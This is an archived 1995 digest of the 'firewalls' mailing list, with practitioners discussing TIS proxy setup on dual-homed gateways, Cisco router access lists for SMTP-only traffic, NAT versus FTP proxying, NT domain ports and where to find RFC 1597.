Web, and Beyond, and Building Countermeasure Tools. Some of the Speakers: Marjory Blumenthal, Dennis Branstad, Jon David, Marc Andreesen, Scott Charney, Dorothy Denning, Lance Hoffman, Marc Rotenberg, Marc Pollitt, Ken Rowe, Gene Troy, Kevin Zeiss, Ed Springer, Mike Nelson, Marshall Abrams, Steve Walker, Gene Schultz, Steve Bellovin, Bill Cheswick, Harold Highland, Joel Sachs, Bill Cook, Marv Schaefer, Matt Bishop, Paul Ferguson, Padgett Peterson, Wayne Madsen, Dave Banisar, Peter Neumann, Corey Schou, Jim Bidzos, and Gene Spafford. This is a list of less than 10% of the speakers at this years conference. From firewalls-owner Thu Oct 5 22:00:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA19820 for firewalls-outgoing; Thu, 5 Oct 1995 21:31:06 -0700 Received: from aurora.cdev.com (aurorax.cdev.com [160.207.114.200]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA19813 for ; Thu, 5 Oct 1995 21:31:02 -0700 Message-Id: <199510060431.VAA19813@miles.greatcircle.com> Received: from cdicisco5.cdev.com by aurora.cdev.com id SMTP-0013074b0f4008400; Thu, 5 Oct 95 23:30:46 -0500 X-Sender: djs3wn39@aurora.cdev.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 05 Oct 1995 20:13:13 -0700 To: meyerd@post.med.uni-marburg.de From: Donald.J.Smith@.cdev.com (Donald J Smith) Subject: http-gw & tis Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: "D.A. Meyer" >Date: Thu, 5 Oct 1995 10:12:43 +0000 >Subject: http-gw on dual-homed gateways > >Hi, >my question of the day is: has anybody tried to run TIS http-gw on a >dual-homed gateway? yes >The proxy has to rewrite the URL, and it seems to do it using the >outside interface name/address (gethostname + gethostbyname). When I >change the hostname so that it is connected to the IP-Adress of the >internal interface, my mail-proxy won't work. >Has anybody build a patch, which rewrites the adress depending on the >interface on which the client-request came in? Any other idea? > I went into the code and hardcoded the name of my inside interface. This will probably only work in one direction, but thats all I need I'm only proxying out. NO ins. (This took about 5 minutes to fix but a day to figure out what was happening ;-) >Thanx >Dirk >- ----------------------------------------------------------------- >Dirk A. Meyer meyerd@mailer.uni-marburg.de Donald J Smith Network Security Engineer @Computing Devices International "@begin design in the security and ease_of_use != A*(1/Data_Security)" (my opinions are mine and so are the spelling errors ;-) From firewalls-owner Thu Oct 5 23:30:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id XAA21726 for firewalls-outgoing; Thu, 5 Oct 1995 23:01:37 -0700 Received: from DOCKMASTER.NCSC.MIL (DOCKMASTER.NCSC.MIL [26.1.0.172]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id XAA21719 for ; Thu, 5 Oct 1995 23:01:31 -0700 Date: Fri, 6 Oct 95 01:58 EDT From: Jon David Subject: Clarification/expansion To: Firewalls@GREATCIRCLE.COM Message-ID: <951006055811.235375@DOCKMASTER.NCSC.MIL> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jack Holleran's posting regarding the 18th National Information Systems Security Conference was a tad on the disorganized side. Of particular interest to readers of this group, well hidden in the list of topics is the fact that a full day (4 consecutive sessions) will be devoted to various aspects of Internet security. The first session will deal with weaknesses and vulnerabilities of the Internet, and will be given by Padgett Peterson. Bill Cheswick and Steve Bellovin will handle the 2nd session dealing with tools. The afternoon will start will Paul Ferguson dealing with setting up proper security, and the final session will have Marcus Ranum and Sarah Gordon discussing the ways to keep your system secure. (Marcus and Sarah didn't make the sample list of speakers in Jack's posting.) Even though each session will have only 1 or 2 speakers, the entire panel will be available for Q&A, and a private room is available for between session discussions of a more personal nature. And, while each session is presented as a stand-alone event, the full sequence is recommended to cover the necessary aspects of Internet security. For those that may be in the novice class, Dr. Harold Highland will be giving an introductory level tutorial the day before. (Since this is Brent's group, be assured he was asked to participate in these sessions. His schedule wouldn't permit him to do so, but he was good enough to send some advertising literature on his seminars which will be given out at the sessions. :-) Jon PS: Do N-O-T contact me for any additional information, contact the man (Holleran@dockmaster.ncsc.mil) who made the original posting. _ _ _ | | | | | | "You don't have to agree with me just because I'm right." ^^^^^^^^^^^ | + + | Jon David PC Security 145 Howard Avenue | + + | President LAN Security Tappan, NY 10983 | _ | The FORTRESS Internet Security U S A | | | | ----\ \--- (914)365-4700 fortress@dockmaster.ncsc.mil From firewalls-owner Fri Oct 6 02:30:09 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA25005 for firewalls-outgoing; Fri, 6 Oct 1995 02:05:55 -0700 Received: from greatdane.cisco.com (greatdane.cisco.com [171.69.1.141]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA24998 for ; Fri, 6 Oct 1995 02:05:46 -0700 Received: (tli@localhost) by greatdane.cisco.com (8.6.8+c/8.6.5) id CAA00830; Fri, 6 Oct 1995 02:04:12 -0700 Date: Fri, 6 Oct 1995 02:04:12 -0700 From: Tony Li Message-Id: <199510060904.CAA00830@greatdane.cisco.com> To: david@monygmc.mony.com (David Kozinn) Cc: firewalls@GreatCircle.COM Subject: Packet filtering OK for mail-only connection? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What I'd like to know is this: Is the Cisco 2501 capable of filtering based on source port (not just source address) so that I can block incoming packets that aren't (apparently) coming from the remote SMTP server? Yes. However, we strongly suggest that you not delude yourself into thinking that a cracker cannot attack using the SMTP well known port as the source port. It would take someone maybe 30 seconds extra to do this. Filtering on destination port is the only sane approach. Does the router provide for blocking start-of-connection packets so that a remote system can't use port 25 to launch an attack as described in Brent's paper? Yes, if you only want to allow outbound connections you can certainly do that. Look at the "established" keyword. Tony From firewalls-owner Fri Oct 6 02:30:16 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA24946 for firewalls-outgoing; Fri, 6 Oct 1995 02:01:03 -0700 Received: from server2.dh.ixe.net (server2.dh.ixe.net [205.244.44.71]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA24918 for ; Fri, 6 Oct 1995 02:00:53 -0700 Received: from nemesis.UUCP (Unemesis@localhost) by server2.dh.ixe.net (8.6.11/8.6.11) with UUCP id JAA24042; Fri, 6 Oct 1995 09:59:10 +0100 Received: from orbit.usn.nl by nemesis.usn.nl with smtp (Smail3.1.28.1 #15) id m0t17de-0005C3C; Fri, 6 Oct 95 09:56 MESZ Message-Id: Date: Fri, 06 Oct 1995 10:59:47 -0500 From: "N.W. van der Lugt" Reply-To: "N.W. van der Lugt" Subject: Re: FTP FW solution To: Paul A Vixie , firewalls@GreatCircle.COM In-Reply-To: <9510042047.AA27158@wisdom.home.vix.com> X-Mailer: EMBLA 1.1 Demo MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk firewalls-owner@GreatCircle.COM: > > environment; YMMV) includes code to parse FTP packets and alter the > > PORT lines, and similar support for talk is pending. > > I guess I thought this would have gone without saying, but I don't agree > with the idea of modifying PORT verbs in stream -- this is a very slippery > slope indeed. IBM's NAT does FTP proxying via DNS tricks and temporary > address assignments, and accomplishes its goals without any layering > violations -- in particular the user data is never interpreted. This goes > to show that it can be done without searching for PORT verbs in user data. So 'NAT does FTP proxying' and this 'without searching for PORT verbs in user data' ? Not right. The FTP proxy, of course, will look at user data. A proxy *IS* Layering Violation #1. We now have the Linux solution (searching and modifying part of the data stream) vs the proxy solution (searching all of the data stream, re-implementing the entire FTP protocol, and sending out it's own data). I prefer the packet filtering methods - generic solutions. With FTP, as we have seen, one should examine the data stream. Thus; the best solution (used by well-known fw) is to combine the two and create a virtual back-connection accept 'rule' when the FTP port command comes by. Klaas (klaas@usn.nl - disclaimers apply) From firewalls-owner Fri Oct 6 07:30:17 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA29826 for firewalls-outgoing; Fri, 6 Oct 1995 07:04:14 -0700 Received: from pony-express.ims.advantis.com (pony-express.ims.advantis.com [165.87.194.144]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA29819 for ; Fri, 6 Oct 1995 07:04:11 -0700 Received: (from uucp@localhost) by pony-express.ims.advantis.com (8.6.9/8.6.9) id JAA29263; Fri, 6 Oct 1995 09:58:16 -0400 Received: from pangloss.ims.advantis.com(164.120.180.21) by pony-express.ims.advantis.com via smap (V1.3) id sma075083; Fri Oct 6 09:58:14 1995 Received: by pangloss.ims.advantis.com (AIX 3.2/UCB 5.64/4.03) id AA62795; Fri, 6 Oct 1995 10:02:43 -0400 Date: Fri, 6 Oct 1995 10:02:43 -0400 (EDT) From: "Henry W. Farkas" To: Andrew & Terri Forster Cc: firewalls@GreatCircle.COM Subject: Re: Copy of RFC1597 In-Reply-To: <9510051838.AA17881@ns2.emirates.net.ae> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- On Thu, 5 Oct 1995, Andrew & Terri Forster wrote: > Being new to the net ( only being in the UAE ) since August I'm interested in > locating a copy of RFC1597. Any assistance as to where I can find it would be > appreciated. Try my security page, if you have web access: http://newstand.ims.advantis.com/henry/security.html You can search or download RFCs from there. =========================================================================== Henry W. Farkas | Me? Speak for IBM? Fat chance. hfarkas@ims.advantis.com |------------------------------------------------ hfarkas@vnet.ibm.com | http://newstand.ims.advantis.com/henry henry@nhcc.com | http://www.nhcc.com/~henry - --------------------------------------------------------------------------- PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52 B3 80 34 1C CE 38 EC 53 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers. - --------------------------------------------------------------------------- Why use cryptogrophy? "Because it's still legal for Americans to hold private conversations." - Phil Zimmermann - Let's keep it that way. =========================================================================== -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Auto-signed with Bryce's Auto-PGP v1.0beta iQCVAwUBMHU27KDthkLkvrK9AQE5/wP+LnpsyQXolu1PUEU31Ei2YEZ/AsBAMzrT z3UTm9mUM71IMi+p705b5SgQMfz2hGkUOqnsPnaXpXvT26TXCRO7Vu7E+G6r24xB E5iOpEIk2w1wifRnJcZlT3QVL8oCDzRY+XqbTfQnTpBuUrl6Qo6s1GYhOQU2d/zE 3H0xdvo/EvA= =dXNB -----END PGP SIGNATURE----- From firewalls-owner Fri Oct 6 09:00:31 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA02904 for firewalls-outgoing; Fri, 6 Oct 1995 08:39:44 -0700 Received: from relay3.UU.NET (relay3.UU.NET [192.48.96.8]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA02890 for ; Fri, 6 Oct 1995 08:39:39 -0700 Received: from uucp3.UU.NET by relay3.UU.NET with SMTP id QQzkhi21848; Fri, 6 Oct 1995 11:38:13 -0400 Received: from fmrco.UUCP by uucp3.UU.NET with UUCP/RMAIL ; Fri, 6 Oct 1995 11:38:13 -0400 Received: from ocean.fmrco.com by fmrco.com (4.1/SMI-4.1) id AA22227; Fri, 6 Oct 95 08:27:12 EDT Received: from capstan by ocean.fmrco.com (4.1/SMI-4.1) id AA04821; Fri, 6 Oct 95 08:26:23 EDT From: fmrco!ocean!ajl@uunet.uu.net (Andrew Luca) Received: by capstan (4.1/Spike-2.1) id AA08000; Fri, 6 Oct 95 08:26:22 EDT Date: Fri, 6 Oct 95 08:26:22 EDT Message-Id: <9510061226.AA08000@capstan> To: uunet!jsc.nasa.gov!mark.horn1@uunet.uu.net Cc: uunet!GreatCircle.COM!firewalls@uunet.uu.net In-Reply-To: (message from uunet!jsc.nasa.gov!mark.horn1 on 4 Oct 1995 16:02:26 U) Subject: Re: Technical details of NT Dom Sender: firewalls-owner@GreatCircle.COM Precedence: bulk From: uunet!jsc.nasa.gov!mark.horn1 Date: 4 Oct 1995 16:02:26 U X-Mailer: Mail*Link SMTP/QM 3.0.0 Mail*Link(r) SMTP Technical details of NT Domains.. Hello, We have some users who need to login to a windows NT domain that has been set up here. We currently have an IP firewall installed. This firewall is installed on our LAN and protects us from the Internet. Since firewalls-owner@GreatCircle.COM Precedence: bulk {Much text deleted to save digital trees} In order to make this work, you need to be forwarding udp broadcast packets on udp ports 137 and 138. This is how the MSW domain system finds a domain controller to authenticate you and log on. Andrew. From firewalls-owner Fri Oct 6 09:01:04 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03298 for firewalls-outgoing; Fri, 6 Oct 1995 08:55:01 -0700 Received: from firat.bcc.bilkent.edu.tr (firat.bcc.bilkent.edu.tr [139.179.10.13]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id IAA03285 for ; Fri, 6 Oct 1995 08:54:02 -0700 Received: by bilkent.edu.tr (5.65c/IDA-1.4) id AA11837; Fri, 6 Oct 1995 09:55:06 +0300 From: akgul@bilkent.edu.tr (Mustafa Akgul) Message-Id: <199510060655.AA11837@firat.bcc.bilkent.edu.tr> Subject: Re: Copy of RFC1597 To: bnowlin@nyjets.lerc.nasa.gov (Ben Nowlin) Date: Fri, 6 Oct 1995 09:55:05 +0300 (EET) Cc: forster@ns2.emirates.net.ae, firewalls@GreatCircle.COM In-Reply-To: <199510051945.PAA15839@nyjets.lerc.nasa.gov> from "Ben Nowlin" at Oct 5, 95 03:45:50 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 322 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk To get a copy of rfc1597.txt by email write to bilkent-server@bilkent.edu.tr in the body begin send rfc1597.txt dir INFO/rfc send HELP end dir INFO/rfc will give you list of available rfc at Bilkent, and HELP is help-file of the mail server software. Best regards Mustafa Akgul Bilkent University Ankara From firewalls-owner Fri Oct 6 09:30:39 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03332 for firewalls-outgoing; Fri, 6 Oct 1995 08:58:06 -0700 Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA03325 for ; Fri, 6 Oct 1995 08:58:01 -0700 Message-Id: <199510061558.IAA03325@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA066644970; Sat, 7 Oct 1995 01:56:10 +1000 From: Darren Reed Subject: Re: Network Address Translation stuff To: paul@vix.com (Paul A Vixie) Date: Sat, 7 Oct 1995 01:56:10 +1000 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9510050656.AA27394@wisdom.home.vix.com> from "Paul A Vixie" at Oct 4, 95 11:56:32 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1172 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Paul A Vixie, sie said: > > > I still don't think that even IBM can do address translation > > without modifying FTP PORT command: you either modify PORT command > > packet-per-packet (as NAT:s seem to do) or you re-create necessary > > commands (as FTP proxy's do it). > > The trick is to use an FTP proxy without the client having to know that > it's talking to an FTP proxy. With a simple DNS trick and a complicated > FTP proxy, you can make these ends meet. > > The thought of modifying PORT verbs in-stream makes my skin crawl. You don't want to look at what the Linux port has done...(someone was raving about Linux, or they will given the chance). It's a surprise it even works (just RTFS for 1.3.31). And just to remind people, the 1.3.* kernels for Linux are development only - use of 1.2.* is recommended for production - this code isn't in 1.2.*. Having looked at the code, it only convinces me that using ftp-gw is by far the better thing to do, especially considering the options available to control ftp-gw c.f. modifying PORT commands in the kernel. I hope the commercial products which do this look a lot better... darren From firewalls-owner Fri Oct 6 09:30:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA03339 for firewalls-outgoing; Fri, 6 Oct 1995 08:58:17 -0700 Received: from pina1.telecom.at (pina1.telecom.at [194.37.252.41]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA03311 for ; Fri, 6 Oct 1995 08:57:52 -0700 Received: from pina2.telecom.at (pina2.telecom.at [194.37.252.42]) by pina1.telecom.at (8.6.10/8.6.6) with ESMTP id QAA34343 for ; Fri, 6 Oct 1995 16:47:24 +0100 Received: (from ilias@localhost) by pina2.telecom.at (8.6.10/8.6.6) id QAA14400 for firewalls@GreatCircle.COM; Fri, 6 Oct 1995 16:53:46 +0100 From: Ilias Liakopoulos Message-Id: <199510061553.QAA14400@pina2.telecom.at> Subject: Re: cisco router extended access-list question ( -> solved ) To: firewalls@GreatCircle.COM Date: Fri, 6 Oct 1995 16:53:46 +0100 (MEZ) X-Mailer: ELM [version 2.4 PL23] Content-Type: text Content-Length: 1564 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi ! my question was: > > I have set up an access-list like the example in UnileverCD > for allowing only SMTP connections (the IP addrs are invented): > > access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 established > access-list 102 permit tcp 1.2.3.4 0.0.0.0 2.2.3.4 0.0.0.0 eq 25 > > SMTP works but with this config I tried telnet and it also works . > this is not acceptable and if I remove the established line -> > nothing works. > the interface config: > > interface Ethernet0 > ip address 2.2.3.2 'some adr mask' > ip access-group 102 out > this is a greatfull mailing list. it was the first problem I added a question and I got many and very usefull answers. the problem is solved like that: interface Ethernet0 ip address 2.2.3.2 'some adr mask' ip access-group 102 out ip access-group 101 in where access-list 101 is exactly like 102 but with swapped dest&source addrs so now SMTP is in and out allowed and nothing else. many,many thanx to all aswerers especially to : Colin Campbell , Bill Bunting, Petter H{ggman , Paul Crossley :-) iLiAS ---------------------------------------------------------------------- Ilias Liakopoulos | Email: ilias@telecom.at Spardat AG & Co KG | Tel: 0043/1/74045-4762 Fax -5704 Geiselbergstr. 21-25 | WWW: http://pina2.telecom.at/~lia 1110-Vienna | nic-hdl: IL7-RIPE Austria | Europe | ---------------------------------------------------------------------- From firewalls-owner Fri Oct 6 10:00:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA04451 for firewalls-outgoing; Fri, 6 Oct 1995 09:36:27 -0700 Received: from noc4.dccs.upenn.edu (NOC4.DCCS.UPENN.EDU [128.91.254.39]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA04442 for ; Fri, 6 Oct 1995 09:36:23 -0700 Received: from JAKE.DCCS.UPENN.EDU by noc4.dccs.upenn.edu id AA11941; Fri, 6 Oct 95 12:34:46 -0400 Date: Fri, 6 Oct 95 12:34:46 -0400 Message-Id: <9510061634.AA11941@noc4.dccs.upenn.edu> X-Sender: tex@pobox.upenn.edu Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: lasseh@microfront.se, Firewalls@greatcircle.com From: boone@isc.upenn.edu (Jon 'tex' Boone) Subject: Re: Address Translators X-Mailer: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 11:05 AM 10/5/95 +0200, lasseh@microfront.se wrote: >A commercial NAT product is Private Internet Exchange from >Network Translation Inc. Any positive things I say about it on >this list would be biased, since we distribute it in Sweden, but >I'll say this: It's a helluva product! > >NTI have a Web site at www.translation.com. > >Lars. > >PS >Any thoughts regarding weaknesses or strengths in this kind of >solution are welcome, since the NAT approach is fairly new and >needs to be discussed. >DS Lars, et. al: I'm glad that you brought this up. I have done an evaluation of this product and have some criticisms of how it works. 1) The version I looked at did not support MTU discovery [according to the guy who wrote the code.] This meant overall poor performance since everywhere that I was trying to go to through the PIX was "off-net" and required a 512-byte MTU. :-( 2) The box will map your address into a new range dynamically and does so well - however, you must already be numbered in a reserved range if you want to have "global" connectivity. For example, if you have already set up your network [net 20.0.0.0, say] and you want to use this box to dynamically map you into your provider's space, you need to renumber into the reserved net 10.0.0.0 space if you want to be able to reach the site that is going to be legitimately using net 20.0.0.0. This should come as no suprise to anyone [re-numbering would normally be required if you are set up for a netwoerk which someone else has already registered for and is routing on the Internet]. However, with a clever hack, you could have this PIX dynamically map the legitimate net 20.0.0.0 hosts into net 10.0.0.0 when talking to the "internal" side and map the non-legitimate net 20.0.0.0 into net 10.0.0.0 on the "external" side. The DNS would have to be hacked to do the same as well. I have spoken with the developers about this idea and they said they would think about it - although they didn't seem that excited by the idea. [The one guy I spoke to thought that you ought to renumber into net 10.0.0.0 and just be done with it - but that isn't always an option.] If this hack could be worked out, then I think that this kind of box would be very popular - especially as the need for CIDR-related renumbering grows. On the positive side, this box is very easy to configure and requires little more than power and ethernt connections to be up and running. Total installation time [including reading the manual] was about 10 minutes. ___________________________________________________________________ Jon 'tex' Boone email: tex@isc.upenn.edu Operations Engineer work: (215) 898 - 2477 ISC - DCCS fax: University of Pennsylvania From firewalls-owner Fri Oct 6 10:31:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA05318 for firewalls-outgoing; Fri, 6 Oct 1995 10:05:46 -0700 Received: from charon.ppco.com (ppco.com [138.32.15.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id KAA05311 for ; Fri, 6 Oct 1995 10:05:20 -0700 From: bcsolom@bvemx.ppco.com Received: from bvemx.ppco.com by charon.ppco.com with SMTP id AA06306 (InterLock SMTP Gateway 3.0 for ); Fri, 6 Oct 1995 11:52:43 -0500 X400-Originator: bcsolom@bvemx.ppco.com X400-Recipients: firewalls@GreatCircle.COM X400-Mts-Identifier: [/ADMD=ATTMAIL/C=US/;0011200001408301000004] X400-Content-Type: P2-1988 (22) Priority: Urgent Message-Id: <0011200001408301000004*@MHS> To: "firewalls(a)GreatCircle.COM" Subject: VRML through a Proxy Date: Fri, 6 Oct 1995 11:49:23 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Has anybody successfully used VRML ( Virtual Reality Markup Language ) through an Application based Proxy firewall? If so, what was the client VRML viewer, and what was the firewall product? From firewalls-owner Fri Oct 6 11:05:44 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA06455 for firewalls-outgoing; Fri, 6 Oct 1995 10:49:31 -0700 Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA06443 for ; Fri, 6 Oct 1995 10:49:28 -0700 Received: by gw.home.vix.com id AA09808; Fri, 6 Oct 95 10:48:03 -0700 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us Received: by wisdom.home.vix.com id AA28636; Fri, 6 Oct 1995 10:48:03 -0700 Message-Id: <9510061748.AA28636@wisdom.home.vix.com> To: firewalls@greatcircle.com Subject: Re: FTP FW solution In-Reply-To: Your message of "Fri, 06 Oct 1995 10:59:47 CDT." Date: Fri, 06 Oct 1995 10:48:02 -0700 From: Paul A Vixie Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > So 'NAT does FTP proxying' and this 'without searching for PORT verbs in user > data' ? > > Not right. The FTP proxy, of course, will look at user data. A proxy > *IS* Layering Violation #1. An FTP proxy speaks the FTP protocol. Rather than modify protocol elements it translates entire transactions (which can have multiple protocol-level verb/response exchanges.) This is a violation in the sense Clark meant in his end-to-end paper way back when, but it's not the same as pattern matching in a stream and making alterations to suit the environment. The fact that I don't like it doesn't mean it won't work or that it's "wrong." But I feel pretty strongly that routers ought to route, and that asking them to modify anything deeper than the transport level headers is just bad news. From firewalls-owner Fri Oct 6 11:30:20 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA06944 for firewalls-outgoing; Fri, 6 Oct 1995 11:02:41 -0700 Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA06937 for ; Fri, 6 Oct 1995 11:02:36 -0700 Received: by gw.home.vix.com id AA10696; Fri, 6 Oct 95 11:01:13 -0700 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us Received: by wisdom.home.vix.com id AA28453; Fri, 6 Oct 1995 11:01:13 -0700 Message-Id: <9510061801.AA28453@wisdom.home.vix.com> To: firewalls@greatcircle.com Subject: Re: Network Address Translation stuff Date: Fri, 06 Oct 1995 11:01:13 -0700 From: Paul A Vixie Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In private e-mail, someone quoted me and then asked a question which I have decided to answer here: > > The trick is to use an FTP proxy without the client having to know that > > it's talking to an FTP proxy. With a simple DNS trick and a complicated > > FTP proxy, you can make these ends meet. > > Could you explain this in a little more detail? Assume an RFC 1597 net which cannot exchange packets with the outside world. Everything a host on the internal net does, it does with other internal hosts or with some kind of fancy border gateway. This includes name service. Assume that the name server is smart enough to answer "creatively" when asked certain questions by internal hosts about external hosts. The border gateway makes the assumption that the time between asking for a remote host's address and attempting to connect to that address will be relatively short, and that these events are for the most part paired (other than as provided for by DNS caching on intermediate internal name servers.) Assume that the addresses given back by our "creative" border name server will refer to internal addresses (probably using alias interfaces) on some border machine, and that border machine has the "socket" command available, and that DNS replies can be made to coincide with execution of "socket" commands. Assume that for protocols which do not contain addresses within them, such as telnet, the above is all that's required. In other cases, like SMTP where the internal hostnames may not be mappable by an external SMTP server, an applic- ation layer gateway (like sendmail running as a mail relay) will be used. In the case of FTP, the application layer gateway is fired up by the creative DNS server and it is given the desired remote host name/address mappings needed to complete the transaction even though the internal FTP client's TCP connection has "ended" at the border. Some of the assumptions, especially the tight binding between DNS replies and remote server identities, are unpleasantly constraining. I observe that this situation is only encountered by clients who don't know about explicit proxies, and as such, most of the user population won't have to suffer with it. Older and dumber clients _do_ work, though. And the benefits of using an RFC 1597 network are just extreme: no renumbering when switching carriers; multihoming for free; absolute packet-level security no matter who misconfigures what. From firewalls-owner Fri Oct 6 11:30:22 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA07338 for firewalls-outgoing; Fri, 6 Oct 1995 11:21:52 -0700 Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA07331 for ; Fri, 6 Oct 1995 11:21:48 -0700 Received: by gw.home.vix.com id AA12384; Fri, 6 Oct 95 11:20:26 -0700 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us Received: by wisdom.home.vix.com id AA28505; Fri, 6 Oct 1995 11:20:25 -0700 Message-Id: <9510061820.AA28505@wisdom.home.vix.com> To: firewalls@greatcircle.com Subject: Re: Network Address Translation stuff In-Reply-To: Your message of "Thu, 05 Oct 1995 11:05:43 +0200." Date: Fri, 06 Oct 1995 11:20:25 -0700 From: Paul A Vixie Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > OK I get it, IBM NAT box has application level proxies inside instead of > pakcet-per-packet address translation. (BTW, Do you know where I can > find info about this IBM box. Quick search on IBM Web site didn't get me > anything) IBM, like DEC and other large companies, makes it just about impossible to buy anything from them unless it's something carried by your local computer store. I've never understood how American industry has lasted so long. I honestly have no idea how you'd go about learning more details about this; perhaps ANS is still reselling them and their web page knows about it? > Let me try to summarize this subject a bit. There seems to be > (at least) 2 different techniques for address translation: > > * Translate IP addresses on each IP packet that goes through, otherwise > let packets go through unmodified. Handling FTP requires some dirty > tricks like modifying data inside IP-pakets that contain FTP PORT > commands. Invisible to users. > > * Use application level proxies. This can be made unvisible to users > by using transparent proxies. All true to the best of my understanding. > Packet-by-packet address translation may be dirty in some sense, > but on other hand it doesn't requre own process on each connection and > requires just a little of state information. It can be implemented > on standalone box with no disks and limited main memory (like router). I think the perceived and widely publicized IPv4 address will lead to all kinds of layer-violating (RFC 1597) and aesthetically-disasterous (IPv6) solutions. Market pressure is going to cause more NAT-like solutions to fall out. You're right that doing it statelessly is better _when_possible_; I'd just like to note that modifying FTP data in-stream is not stateless even if a kernel-only implementation would be diskless. From firewalls-owner Fri Oct 6 12:00:27 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id LAA08145 for firewalls-outgoing; Fri, 6 Oct 1995 11:49:02 -0700 Received: from prometheus.microchip.com (PROMETHEUS.MICROCHIP.COM [198.175.253.66]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id LAA08138 for ; Fri, 6 Oct 1995 11:48:59 -0700 Received: (from daemon@localhost) by prometheus.microchip.com (8.6.12/8.6.9) id LAA11033 for ; Fri, 6 Oct 1995 11:53:03 -0700 Received: from pegasus.microchip.com(199.170.150.38) by prometheus.microchip.com via smap (V1.3) id sma011031; Fri Oct 6 11:52:33 1995 Received: from localhost (localhost.Microchip.COM [127.0.0.1]) by pegasus.Microchip.COM (8.7/8.7) with ESMTP id LAA20120; Fri, 6 Oct 1995 11:38:49 -0700 (MST) Message-Id: <199510061838.LAA20120@pegasus.Microchip.COM> To: firewalls@greatcircle.com, fwtk-list@tis.com cc: meyerd@post.med.uni-marburg.de, Donald.J.Smith@cdev.com Subject: Re: http-gw & tis In-reply-to: Your message of "Thu, 05 Oct 1995 20:13:13 MST." <199510060431.VAA19813@miles.greatcircle.com> Date: Fri, 06 Oct 1995 11:38:45 -0700 From: Gustavo Vegas Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >From: "D.A. Meyer" >Date: Thu, 5 Oct 1995 10:12:43 +0000 >Subject: http-gw on dual-homed gateways >......[text deleted...] >The proxy has to rewrite the URL, and it seems to do it using the >outside interface name/address (gethostname + gethostbyname). When I >change the hostname so that it is connected to the IP-Adress of the >internal interface, my mail-proxy won't work. >Has anybody build a patch, which rewrites the adress depending on the >interface on which the client-request came in? 